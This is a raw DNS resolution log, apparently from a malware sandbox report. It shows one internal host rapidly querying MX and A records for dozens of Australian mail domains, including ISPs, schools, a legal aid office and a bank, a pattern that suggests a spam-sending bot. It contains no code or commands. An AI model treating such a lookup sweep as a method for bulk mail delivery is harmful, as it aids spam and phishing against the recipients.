                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:24.987422943 CET8.8.8.8192.168.2.30x2843No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.078290939 CET8.8.8.8192.168.2.30x6e89No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.107553005 CET8.8.8.8192.168.2.30xc460No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.183857918 CET8.8.8.8192.168.2.30x731dNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.183857918 CET8.8.8.8192.168.2.30x731dNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.183857918 CET8.8.8.8192.168.2.30x731dNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.183857918 CET8.8.8.8192.168.2.30x731dNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.183857918 CET8.8.8.8192.168.2.30x731dNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.183857918 CET8.8.8.8192.168.2.30x731dNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.183857918 CET8.8.8.8192.168.2.30x731dNo error (0)g.austincc.eduMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.211774111 CET8.8.8.8192.168.2.30x5b8aNo error (0)ASPMX.L.google.com108.177.126.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.279244900 CET8.8.8.8192.168.2.30x7a29Name error (3)turncoatstudios.com.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.304024935 CET8.8.8.8192.168.2.30xb5e2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.304024935 CET8.8.8.8192.168.2.30xb5e2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.304024935 CET8.8.8.8192.168.2.30xb5e2No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.324475050 CET8.8.8.8192.168.2.30x1936No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.388982058 CET8.8.8.8192.168.2.30x3b0aNo error (0)amp.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.430512905 CET8.8.8.8192.168.2.30x9ffbNo error (0)amp-com-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.430512905 CET8.8.8.8192.168.2.30x9ffbNo error (0)amp-com-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.556585073 CET8.8.8.8192.168.2.30x17fdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.556585073 CET8.8.8.8192.168.2.30x17fdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.556585073 CET8.8.8.8192.168.2.30x17fdNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.576910019 CET8.8.8.8192.168.2.30x1160No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.640618086 CET8.8.8.8192.168.2.30x3f3dNo error (0)optushome.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.727864027 CET8.8.8.8192.168.2.30xc68bNo error (0)aapt.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.745800018 CET8.8.8.8192.168.2.30xa0c4No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.834769964 CET8.8.8.8192.168.2.30xeb84No error (0)adam.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.853763103 CET8.8.8.8192.168.2.30x3af1No error (0)asav.iinet.net.au203.59.218.120A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.888346910 CET8.8.8.8192.168.2.30xa669No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.888346910 CET8.8.8.8192.168.2.30xa669No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.888346910 CET8.8.8.8192.168.2.30xa669No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.913552046 CET8.8.8.8192.168.2.30x5e1eNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.942660093 CET8.8.8.8192.168.2.30xc0dbNo error (0)mail.optusnet.com.au211.29.132.250A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.958908081 CET8.8.8.8192.168.2.30x640cNo error (0)mysoul.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:25.977639914 CET8.8.8.8192.168.2.30xa9d7No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.099442959 CET8.8.8.8192.168.2.30x7104No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.100651979 CET8.8.8.8192.168.2.30x873bName error (3)centrum.sk.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.119642973 CET8.8.8.8192.168.2.30xc42No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.183271885 CET8.8.8.8192.168.2.30xc01No error (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.204505920 CET8.8.8.8192.168.2.30xe0b7No error (0)extmail.bpbb.bigpond.com203.36.172.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.204505920 CET8.8.8.8192.168.2.30xe0b7No error (0)extmail.bpbb.bigpond.com203.36.137.234A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.426820993 CET8.8.8.8192.168.2.30x9b4eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.426820993 CET8.8.8.8192.168.2.30x9b4eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.426820993 CET8.8.8.8192.168.2.30x9b4eNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.446064949 CET8.8.8.8192.168.2.30xddd1No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.451127052 CET8.8.8.8192.168.2.30x4793No error (0)bowering.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.451127052 CET8.8.8.8192.168.2.30x4793No error (0)bowering.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.476432085 CET8.8.8.8192.168.2.30xf9f6No error (0)mx1.emailsrvr.com184.106.54.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.522125006 CET8.8.8.8192.168.2.30xd81cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.522125006 CET8.8.8.8192.168.2.30xd81cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.522125006 CET8.8.8.8192.168.2.30xd81cNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.542697906 CET8.8.8.8192.168.2.30xfa06No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.607741117 CET8.8.8.8192.168.2.30xba90No error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.637962103 CET8.8.8.8192.168.2.30x56eNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.637962103 CET8.8.8.8192.168.2.30x56eNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.682961941 CET8.8.8.8192.168.2.30xfd12No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.682961941 CET8.8.8.8192.168.2.30xfd12No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.682961941 CET8.8.8.8192.168.2.30xfd12No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.714242935 CET8.8.8.8192.168.2.30x9ff8No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.762783051 CET8.8.8.8192.168.2.30x3a31No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.847800016 CET8.8.8.8192.168.2.30xcc99No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:26.983520031 CET8.8.8.8192.168.2.30xd09bNo error (0)tafensw.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.031341076 CET8.8.8.8192.168.2.30x1bfNo error (0)tafensw-net-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.031341076 CET8.8.8.8192.168.2.30x1bfNo error (0)tafensw-net-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.101397991 CET8.8.8.8192.168.2.30x8913No error (0)snowy.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.101397991 CET8.8.8.8192.168.2.30x8913No error (0)snowy.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.101397991 CET8.8.8.8192.168.2.30x8913No error (0)snowy.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.455921888 CET8.8.8.8192.168.2.30x153cNo error (0)sp1mx.hosting-australia.commx.spamexperts.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.455921888 CET8.8.8.8192.168.2.30x153cNo error (0)mx.spamexperts.com130.117.53.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.717952013 CET8.8.8.8192.168.2.30xad4bNo error (0)gotalk.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.745305061 CET8.8.8.8192.168.2.30xf66aNo error (0)legalaid.tas.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.810717106 CET8.8.8.8192.168.2.30xca62No error (0)ncable.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.825653076 CET8.8.8.8192.168.2.30x9bc5No error (0)legalaid-tas-gov-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.825653076 CET8.8.8.8192.168.2.30x9bc5No error (0)legalaid-tas-gov-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.929568052 CET8.8.8.8192.168.2.30xf63aNo error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.931840897 CET8.8.8.8192.168.2.30xa618No error (0)mx.ncable.net.au203.208.88.30A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:27.971240997 CET8.8.8.8192.168.2.30xc8b0No error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.106131077 CET8.8.8.8192.168.2.30xadefNo error (0)mx-ctdodo.gtm.oss-core.net203.134.71.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.106131077 CET8.8.8.8192.168.2.30xadefNo error (0)mx-ctdodo.gtm.oss-core.net203.134.153.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.157793045 CET8.8.8.8192.168.2.30x1263No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.157793045 CET8.8.8.8192.168.2.30x1263No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.157793045 CET8.8.8.8192.168.2.30x1263No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.192290068 CET8.8.8.8192.168.2.30x1515No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.206180096 CET8.8.8.8192.168.2.30x64f0No error (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.395277023 CET8.8.8.8192.168.2.30xab2dNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.395277023 CET8.8.8.8192.168.2.30xab2dNo error (0)eq-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.412750006 CET8.8.8.8192.168.2.30x1326No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.487988949 CET8.8.8.8192.168.2.30x7d14No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.519049883 CET8.8.8.8192.168.2.30xd365No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.519049883 CET8.8.8.8192.168.2.30xd365No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.519049883 CET8.8.8.8192.168.2.30xd365No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.608222008 CET8.8.8.8192.168.2.30xf49aNo error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.765000105 CET8.8.8.8192.168.2.30xee4dNo error (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.765000105 CET8.8.8.8192.168.2.30xee4dNo error (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.765000105 CET8.8.8.8192.168.2.30xee4dNo error (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.765000105 CET8.8.8.8192.168.2.30xee4dNo error (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.765000105 CET8.8.8.8192.168.2.30xee4dNo error (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.765000105 CET8.8.8.8192.168.2.30xee4dNo error (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:28.765000105 CET8.8.8.8192.168.2.30xee4dNo error (0)beagle.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.829586029 CET8.8.8.8192.168.2.30x1a2cNo error (0)westpac.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:29.856834888 CET8.8.8.8192.168.2.30x903bNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
